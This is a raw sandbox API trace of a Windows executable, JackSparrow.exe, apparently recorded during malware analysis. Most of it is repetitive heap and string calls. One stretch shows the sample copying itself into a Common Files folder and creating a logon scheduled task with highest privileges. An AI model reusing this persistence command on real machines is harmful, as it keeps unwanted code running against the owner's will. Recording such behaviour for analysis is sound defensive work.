lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.038] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.039] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.040] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.041] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.042] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.043] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.044] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.045] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.046] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.047] CharUpperBuffW (in: lpsz="_BYTESTOBITS", cchLength=0xc | out: lpsz="_BYTESTOBITS") returned 0xc [0027.313] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x6af200 | out: lpFindFileData=0x6af200*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x74852d, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7734e36c, ftLastAccessTime.dwHighDateTime=0x7734e0d2, ftLastWriteTime.dwLowDateTime=0x889298, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x7b4440, cFileName="룰3뇐zC%䉠", cAlternateFileName="")) returned 0xffffffff [0027.313] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\26207383702620738370", lpFindFileData=0x6aefa8 | out: lpFindFileData=0x6aefa8*(dwFileAttributes=0xa, ftCreationTime.dwLowDateTime=0x74852d, ftCreationTime.dwHighDateTime=0xfffffffe, ftLastAccessTime.dwLowDateTime=0x7734e36c, ftLastAccessTime.dwHighDateTime=0x7734e0d2, ftLastWriteTime.dwLowDateTime=0x8894c0, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x770000, dwReserved1=0x7b4440, cFileName="룶3", cAlternateFileName="")) returned 0xffffffff [0027.313] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\JACKSP~1.EXE", nBufferLength=0x7fff, lpBuffer=0x69f048, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\Desktop\\JACKSP~1.EXE", lpFilePart=0x0) returned 0x26 [0027.313] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1", nBufferLength=0x7fff, lpBuffer=0x69f048, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1", lpFilePart=0x0) returned 0x14 [0027.313] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0027.314] FindFirstFileW (in: lpFileName="C:\\Users\\5P5NRG~1\\Desktop\\JACKSP~1.EXE", lpFindFileData=0x6af060 | out: lpFindFileData=0x6af060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe95e00, ftCreationTime.dwHighDateTime=0x1d5e3d9, ftLastAccessTime.dwLowDateTime=0x181f480, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0xffb83100, ftLastWriteTime.dwHighDateTime=0x1d5e3d8, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x6af1f0, dwReserved1=0x127ca9d, cFileName="JackSparrow.exe", cAlternateFileName="JACKSP~1.EXE")) returned 0x7ed268 [0027.314] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\JackSparrow.exe", lpFindFileData=0x6aedf0 | out: lpFindFileData=0x6aedf0*(dwFileAttributes=0x6af2b4, ftCreationTime.dwLowDateTime=0x1e0044, ftCreationTime.dwHighDateTime=0x4264, ftLastAccessTime.dwLowDateTime=0x800029, ftLastAccessTime.dwHighDateTime=0x250043, ftLastWriteTime.dwLowDateTime=0x4264, ftLastWriteTime.dwHighDateTime=0x7734e36c, nFileSizeHigh=0x772ab9f5, nFileSizeLow=0x6af304, dwReserved0=0x7701ec, dwReserved1=0x770000, cFileName="\"C\x01", cAlternateFileName="\x1e")) returned 0xffffffff [0027.315] CopyFileExW (lpExistingFileName="C:\\Users\\5P5NRG~1\\Desktop\\JackSparrow.exe" (normalized: "c:\\users\\5p5nrg~1\\desktop\\jacksparrow.exe"), lpNewFileName="C:\\PROGRA~2\\COMMON~1\\JackSparrow.exe" (normalized: "c:\\progra~2\\common~1\\jacksparrow.exe"), lpProgressRoutine=0x0, lpData=0x0, pbCancel=0x6af044, dwCopyFlags=0x8) returned 1 [0027.355] FindNextFileW (in: hFindFile=0x7ed268, lpFindFileData=0x6af060 | out: lpFindFileData=0x6af060*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe95e00, ftCreationTime.dwHighDateTime=0x1d5e3d9, ftLastAccessTime.dwLowDateTime=0x181f480, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0xffb83100, ftLastWriteTime.dwHighDateTime=0x1d5e3d8, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x6af1f0, dwReserved1=0x127ca9d, cFileName="JackSparrow.exe", cAlternateFileName="JACKSP~1.EXE")) returned 0 [0027.355] FindClose (in: hFindFile=0x7ed268 | out: hFindFile=0x7ed268) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2a8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af518 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894a8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4e8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac6e8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2b8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87a428 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2e8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac670 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2d8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3478 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889418 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892e0 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0027.356] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892e0 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2f8 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b7ae0 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2d8 [0027.356] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x6aeec8, nSize=0x104 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889418 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2a8 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2e8 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b7ae0 | out: hHeap=0x770000) returned 1 [0027.356] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2d8 | out: hHeap=0x770000) returned 1 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2d8 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae788 [0027.356] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x110) returned 0x7b4130 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2a8 | out: hHeap=0x770000) returned 1 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae788 | out: hHeap=0x770000) returned 1 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2d8 | out: hHeap=0x770000) returned 1 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2f8 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2f8 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b7ae0 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2d8 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b7ae0 | out: hHeap=0x770000) returned 1 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2d8 | out: hHeap=0x770000) returned 1 [0027.357] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2f8 | out: hHeap=0x770000) returned 1 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xfa) returned 0x7b5348 [0027.357] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x2) returned 0x7af2f8 [0027.357] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x26 [0027.358] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4e) returned 0x7f3478 [0027.358] GetCurrentDirectoryW (in: nBufferLength=0x26, lpBuffer=0x7f3478 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0027.358] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x6af318*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x6af2e0 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\JACKSP~1.EXE", lpProcessInformation=0x6af2e0*(hProcess=0x134, hThread=0x128, dwProcessId=0xae4, dwThreadId=0x494)) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b5348 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7f3478 | out: hHeap=0x770000) returned 1 [0027.373] CloseHandle (hObject=0x128) returned 1 [0027.373] CloseHandle (hObject=0x134) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4130 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2e8 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889418 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8892e0 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894c0 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889298 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8894a8 | out: hHeap=0x770000) returned 1 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0027.373] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ed228 | out: hHeap=0x770000) returned 1 [0027.373] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0027.373] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab1d0 | out: hHeap=0x770000) returned 1 [0027.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ce8 | out: hHeap=0x770000) returned 1 [0027.374] PeekMessageW (in: lpMsg=0x6af6cc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af6cc) returned 0 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2e8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0027.374] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0027.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0b08 | out: hHeap=0x770000) returned 1 [0027.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2e8 | out: hHeap=0x770000) returned 1 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889ce8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab1d0 [0027.374] PeekMessageW (in: lpMsg=0x6af474, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af474) returned 0 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2e8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0b08 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894a8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2d8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889298 [0027.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2d8 | out: hHeap=0x770000) returned 1 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8894c0 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af2d8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8892e0 [0027.374] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af2d8 | out: hHeap=0x770000) returned 1 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889418 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889df0 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2d8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889d60 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af2b8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891c0 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4e8 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dc0 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af518 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af288 [0027.374] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7b4130 [0027.375] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dc0 | out: hHeap=0x770000) returned 1 [0027.375] 